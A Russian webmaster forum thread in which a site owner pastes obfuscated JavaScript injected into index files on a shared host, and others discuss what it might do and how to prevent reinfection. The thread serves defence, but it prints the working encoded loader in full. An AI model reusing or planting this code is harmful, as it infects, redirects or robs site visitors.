- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
На днях на одном shared-хостинге случилась непрятность - у некоторых пользователей (может быть у всех) в файлы index.php и index.html добавился следующий код:
style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+"
{"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var
last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};var
sdn={dic:9797,cen:function(){createCSS("#c0","background: url(data:,evaString.fromCharCode)");var yf=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var
pzk=r.cssRules||r.rules;for(var evo=0;evo<pzk.length;evo++){var
dclf=pzk.item?pzk.item(evo):pzk[evo];pnl=dclf.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];if((pnl!=null)&&(pnl.indexOf("Str")!=-1))
yf=pnl;};}catch(e){};}
var s="";var g=function(){return this;}();ajc=g[yf.substr(0,3)+"l"];var
ml="9788q9788q9692q9695q9765q9757q9697q9686q9698q9680q9688q9696q9687q9681q9751q9694q9696q9681q9728q9689q9696q9688q9696q9687q9681q9682q9731q9676q9713q9700q9694q9719q9700q9688q9696q9757q9758q9699q9686q9697q9676q9758q9756q9706q9749q9704q9756q9674q9784q9788q9788q9788q9692q9695q9683q9700q9688q9696q9683q9757q9756q9738q9784q9788q9788q9672q9765q9696q9689q9682q9696q9765q9674q9784q9788q9788q9788q9679q9700q9683q9765q9699q9697q9676q9765q9736q9765q9697q9686q9698q9680q9688q9696q9687q9681q9751q9698q9683q9696q9700q9681q9696q9728q9689q9696q9688q9696q9687q9681q9757q9763q9699q9686q9697q9676q9763q9756q9738q9784q9788q9788q9788q9681q9683q9676q9765q9674q9784q9788q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9700q9685q9685q9696q9687q9697q9730q9693q9692q9689q9697q9757q9699q9697q9676q9756q9738q9784q9788q9788q9788q9672q9765q9698q9700q9681q9698q9693q9765q9757q9696q9756q9765q9674q9784q9788q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9699q9686q9697q9676q9765q9736q9765q9699q9697q9676q9738q9784q9788q9788q9788q9672q9784q9788q9788q9788q9692q9695q9765q9757q9697q9686q9698q9680q9688q9696q9687q9681q9751q9694q9696q9681q9728q9689q9696q9688q9696q9687q9681q9682q9731q9676q9713q9700q9694q9719q9700q9688q9696q9757q9758q9699q9686q9697q9676q9758q9756q9706q9749q9704q9756q9674q9784q9788q9788q9788q9788q9692q9695q9683q9700q9688q9696q9683q9757q9756q9738q9784q9788q9788q9788q9672q9765q9696q9689q9682q9696q9765q9674q9784q9788q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9678q9683q9692q9681q9696q9757q9763q9737q9692q9695q9683q9700q9688q9696q9765q9682q9683q9698q9736q9758q9693q9681q9681q9685q9739q9750q9750q9682q9692q9689q9692q9690q9681q9696q9679q9751q9698q9686q9751q9698q9698q9750q9692q9687q9698q9689q9680q9697q9696q9751q9685q9693q9685q9758q9765q9678q9692q9697q9681q9693q9736q9758q9748q9749q9758q9765q9693q9696q9692q9694q9693q9681q9736q9758q9748q9749q9758q9765q9682q9681q9676q9689q9696q9736q9758q9679q9692q9682q9692q9699q9692q9689q9692q9681q9676q9739q9693q9692q9697q9697q9696q9687q9738q9685q9686q9682q9692q9681q9692q9686q9687q9739q9700q9699q9682q9686q9689q9680q9681q9696q9738q9689q9696q9695q9681q9739q9749q9738q9681q9686q9685q9739q9749q9738q9758q9735q9737q9750q9692q9695q9683q9700q9688q9696q9735q9763q9756q9738q9784q9788q9788q9788q9672q9784q9788q9788q9672q9784q9788q9788q9695q9680q9687q9698q9681q9692q9686q9687q9765q9692q9695q9683q9700q9688q9696q9683q9757q9756q9674q9784q9788q9788q9788q9679q9700q9683q9765q9695q9765q9736q9765q9697q9686q9698q9680q9688q9696q9687q9681q9751q9698q9683q9696q9700q9681q9696q9728q9689q9696q9688q9696q9687q9681q9757q9758q9692q9695q9683q9700q9688q9696q9758q9756q9738q9695q9751q9682q9696q9681q9732q9681q9681q9683q9692q9699q9680q9681q9696q9757q9758q9682q9683q9698q9758q9753q9758q9693q9681q9681q9685q9739q9750q9750q9682q9692q9689q9692q9690q9681q9696q9679q9751q9698q9686q9751q9698q9698q9750q9692q9687q9698q9689q9680q9697q9696q9751q9685q9693q9685q9758q9756q9738q9695q9751q9682q9681q9676q9689q9696q9751q9679q9692q9682q9692q9699q9692q9689q9692q9681q9676q9736q9758q9693q9692q9697q9697q9696q9687q9758q9738q9695q9751q9682q9681q9676q9689q9696q9751q9685q9686q9682q9692q9681q9692q9686q9687q9736q9758q9700q9699q9682q9686q9689q9680q9681q9696q9758q9738q9695q9751q9682q9681q9676q9689q9696q9751q9689q9696q9695q9681q9736q9758q9749q9758q9738q9695q9751q9682q9681q9676q9689q9696q9751q9681q9686q9685q9736q9758q9749q9758q9738q9695q9751q9682q9696q9681q9732q9681q9681q9683q9692q9699q9680q9681q9696q9757q9758q9678q9692q9697q9681q9693q9758q9753q9758q9748q9749q9758q9756q9738q9695q9751q9682q9696q9681q9732q9681q9681q9683q9692q9699q9680q9681q9696q9757q9758q9693q9696q9692q9694q9693q9681q9758q9753q9758q9748q9749q9758q9756q9738q9784q9788q9788q9788q9697q9686q9698q9680q9688q9696q9687q9681q9751q9694q9696q9681q9728q9689q9696q9688q9696q9687q9681q9682q9731q9676q9713q9700q9694q9719q9700q9688q9696q9757q9758q9699q9686q9697q9676q9758q9756q9706q9749q9704q9751q9700q9685q9685q9696q9687q9697q9730q9693q9692q9689q9697q9757q9695q9756q9738q9784q9788q9788q9672".split("q");xxe=ajc(yf.substr(3));for(var
i=0;i<ml.length;i++){whb=sdn.dic-parseInt(ml);s+=(xxe(whb));}
ajc(s);}};sdn.cen();</script>
Это кусок, во вложении полный вариант, там по-моему он повторяется еще 3 раза.
Интересует, что делает данный скрипт? (Хостер на этот вопрос не ответил)
Интересует, что делает данный скрипт?
Ничего хорошего, это зашифрованный JavaScript, заниматься декодированием не охота, но ничего хорошего такие скрипты не делают, такие скрипты могут:
1) посадить вирус всем пользователям вашего сайта
2) отправлять всех пользователей на другой сайт
3) открывать попап рекламу на вашем сайте
4) воровать пароли и другие данные пользователей вашего сайта
Обычно попадают на сайт через кражу фтп пароля, впрочем кривые руки хостеров тоже могут этому "помочь".
Необязательно от хостера - могли украсть(или подобрать) пароли от вашего FTP и вставить подобное.
Или же через дыру в движке (WP, DLE), если стоят соответствующие права на шаблоны.
вот расшифрованный вариант http://zalil.ru/30479977
ничего плохого в коде не увидел
Про ftp сразу подумал, сменил пароль, начал искать зверьков у себя на компе, а потом зашел на форум хостера, и оказалось что в этот день эта проблема появилась не у меня одного. А хостер еще взял и тему удалил.
Кстати, мне еще повезло. Сайты выдали ошибку вместо исполнения скрипта, я поэтому и заметил, а так бы...🙅
эт старый вирус, он во все файлы index
добавляет свой код, права доступа на файл поменяйте, попробуйте запретить запись файле.
В данном случае это, возможно, поможет, но хотелось бы оградить сайты от этого в будущем, в связи с чем вопрос:
Если выставить доступ к ISPпенели только с моего ip, доступ по ftp будет возможен тоже только с моего ip? Или нет?
вот расшифрованный вариант
Если расшифровывать то до конца, в так называемом "расшифрованном" коде есть опять таки зашифрованный кусок, поэтому говорить о том что там нет ничего плохого рано.
WhiteSmartFox добавил 09-02-2011 в 18:15
Если выставить доступ к ISPпенели только с моего ip, доступ по ftp будет возможен тоже только с моего ip? Или нет?
Нет, доступ к панели и доступ к фтп это разные вещи.
WhiteSmartFox добавил 09-02-2011 в 18:17
хотелось бы оградить сайты от этого в будущем
Выключайте фтп (или меняйте) пароль после каждого использования (если пользуйтесь не часто). Есть скрипты считающие контрольную сумму каждого php (html) файла, есть сервисы, сообщающие о новых JS скриптах на сайте.
ftp пользуюсь часто, да еще на разных хостингах, каждый раз менять пароли слишком долго, скрипты и сервисы это хорошо, но хочется простого и единого решения для разных хостингов и сайтов.
Если к панели и ftp разрешить доступ только со своего ip, может ли это оградить в бОльшей степени от таких сюрпризов?
И если да, то:
Доступ к ftp по ip лучше реализовать через .ftpaccess или как-то по другому?
Если к панели и ftp разрешить доступ только со своего ip, может ли это оградить в бОльшей степени от таких сюрпризов
Наверное, но только если троян будет воровать пароли, а не сразу заливать код на сервер с вашего ип (тогда это не поможет).